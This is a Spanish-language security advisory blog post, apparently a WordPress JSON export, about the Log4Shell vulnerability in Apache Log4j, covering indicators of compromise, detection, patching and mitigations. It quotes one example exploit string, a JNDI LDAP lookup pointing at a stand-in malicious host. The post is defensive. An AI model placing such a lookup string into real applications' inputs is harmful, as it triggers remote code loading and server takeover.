![\"\"](\"https:\/\/etek.com\/es\/wp-content\/uploads\/2021\/12\/image-2.png\")
<\/figcaption><\/figure><\/div>\n\n\n\n
Indicadores de Compromiso (IoC)<\/h3>\n\n\n\n
En los siguientes enlaces se podr\u00e1 obtener m\u00e1s informaci\u00f3n a los nuevos Indicadores de Compromisos que diferentes actores de amenazas est\u00e1n utlizando para la ejecuci\u00f3n de la vulnerabilidad:<\/p>\n\n\n\n
- https:\/\/github.com\/NCSC-NL\/log4shell<\/a><\/li>
- https:\/\/github.com\/curated-intel\/Log4Shell-IOCs<\/a><\/li>
- https:\/\/pastebin.com\/<\/a>QADArZXJ<\/a><\/li><\/ul>\n\n\n\n
La vulnerabilidad ha sido asignada como CVE-2021-44228<\/strong><\/a> <\/strong>y con una puntuaci\u00f3n CVSS de 10 sobre 10<\/a>. El ciberatacante, para poder explotarla, requiere que la aplicaci\u00f3n registre una cadena especial, una serie de caracteres por ejemplo: ${jndi:ldap:\/\/sitio-malicioso.com\/exp}. Matthew Prince especialista en Seguridad Inform\u00e1tica, en su perfil de Twitter<\/a>, informa de evidencias de que el exploit estaba disponible al menos 9 d\u00edas antes de su publicaci\u00f3n.<\/p>\n\n\n\n
Al d\u00eda de hoy hay muchos atacantes que est\u00e1n explotando la vulnerabilidad Log4Shell y poder llevar a cabo sus ataques. Pueden, por ejemplo, instalar mineros de criptomonedas en un servidor, convertir los dispositivos afectados en una botnet, introducir alg\u00fan tipo de malware hasta tomar control remoto de los sistemas afectados<\/p>\n\n\n\n
C\u00f3mo Detectar esta vulnerabilidad<\/h3>\n\n\n\n
Hay varias formas de hacerlo y una de las m\u00e1s sencillas es conocer la versi\u00f3n <\/strong>de Log4j <\/strong>que tiene instalada. Las vulnerables van desde la 2.0-beta9 hasta la 2.14.1.<\/p>\n\n\n\n
Adem\u00e1s, en GitHub <\/a>podemos encontrar los pasos para ejecutar comandos y detectar si la vulnerabilidad registrada como CVE-2021-44228 est\u00e1 presente o no. Este esc\u00e1ner basado en Python<\/a> act\u00faa como detector de la vulnerabilidad <\/strong>Log4Shell.<\/p>\n\n\n\n
C\u00f3mo remediar esta vulnerabilidad<\/h3>\n\n\n\n
Apache Software Foundation ha publicado un aviso de seguridad para solucionar una vulnerabilidad de ejecuci\u00f3n remota de c\u00f3digo (CVE-2021-44228) que afecta a las versiones 2.0-beta9 a 2.14.1 de Log4j. CISA recomienda a los usuarios y administradores a revisar el anuncio de Apache Log4j 2.15.0<\/a> y actualizar a Log4j 2.15.0<\/a> o aplicar las mitigaciones recomendadas inmediatamente.<\/p>\n\n\n\n
![\"\"](\"https:\/\/etek.com\/es\/wp-content\/uploads\/2021\/12\/image-3.png\")
MITRE ATT&CK Tactics and Techniques<\/figcaption><\/figure><\/div>\n\n\n\nRecomendaciones:<\/h3>\n\n\n\n
Se recomienda validar junto con fabricantes que sistemas de los utilizados puedan estar siendo vulnerables y la forma de ejecutar el parche de esta y actualizar las Firmas de los IPS u otras herramientas tipo Zero Day para que ayuden a detectar tr\u00e1fico o comportamientos relacionados. Si no se puede parchar de manera inmediata las instancias vulnerables, puede ser mitigada a trav\u00e9s de los siguientes pasos:<\/p>\n\n\n\n
- Para >=2.10, establezca la propiedad del sistema log4j2.formatMsgNoLookups a true.<\/li>
- Para >=2.10, establezca la variable de entorno LOG4J_FORMAT_MSG_NO_LOOKUPS a true<\/li>
- Para las versiones 2.0-beta9 a 2.10.0, elimine JndiLookup.class de la ruta de clases:zip -q -d log4j core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class.<\/li>
Limitar el tr\u00e1fico de salida a Internet s\u00f3lo desde los puertos necesarios.<\/li><\/ul>\n\n\n\n
Para m\u00e1s informaci\u00f3n puede consultar las siguientes fuentes asociadas a la noticia:<\/h3>\n\n\n\n
- https:\/\/socradar.io\/what-do-you-know-about-the-log4j-critical-vulnerability-and-what-can-we-do\/#8-Are-There-Any-IOCs-that-the-SOC-Teams-Can-Use-to-Prevent-Exploitation-of-the-Vulnerability-on-Internet-Exposed-Servers<\/a><\/li>
- https:\/\/www.larazon.es\/tecnologia\/20211212\/emnq6z4rejgu5fsnerxwbfdesq.html?outputType=amp<\/a><\/li>
- https:\/\/www.ccn-cert.cni.es\/seguridad-al-dia\/alertas-ccn-cert\/11435-ccn-cert-al-09-21-vulnerabilidad-en-apache-log4j-2.html<\/a><\/li>
- https:\/\/kc.mcafee.com\/corporate\/index?page=content&id=KB95091<\/a><\/li>
- https:\/\/supportcenter.checkpoint.com\/supportcenter\/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk176865&partition=Basic&product=IPS<\/a><\/li>
- https:\/\/www.fortinet.com\/blog\/psirt-blogs\/apache-log4j-vulnerability<\/a><\/li>
- https:\/\/blog.segu-info.com.ar\/2021\/12\/log4shell-vulnerabilidad-critica-con.html<\/a><\/li>
- https:\/\/www.trendmicro.com\/en_us\/research\/21\/l\/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html<\/a><\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"
El 9 de diciembre se inform\u00f3 de una vulnerabilidad cr\u00edtica de ejecuci\u00f3n remota de c\u00f3digo (RCE) en el paquete de registro de Apache Log4j 2 versiones 2.14.1 e inferiores. Apache Log4j es la biblioteca de registro java m\u00e1s popular, con m\u00e1s de 400.000 descargas en su proyecto GitHub. Es utilizada por un gran n\u00famero de […]<\/p>\n","protected":false},"author":2,"featured_media":5384,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/posts\/5391"}],"collection":[{"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/comments?post=5391"}],"version-history":[{"count":0,"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/posts\/5391\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/etek.com\/es\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/media?parent=5391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/categories?post=5391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/tags?post=5391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
- https:\/\/socradar.io\/what-do-you-know-about-the-log4j-critical-vulnerability-and-what-can-we-do\/#8-Are-There-Any-IOCs-that-the-SOC-Teams-Can-Use-to-Prevent-Exploitation-of-the-Vulnerability-on-Internet-Exposed-Servers<\/a><\/li>
- https:\/\/github.com\/curated-intel\/Log4Shell-IOCs<\/a><\/li>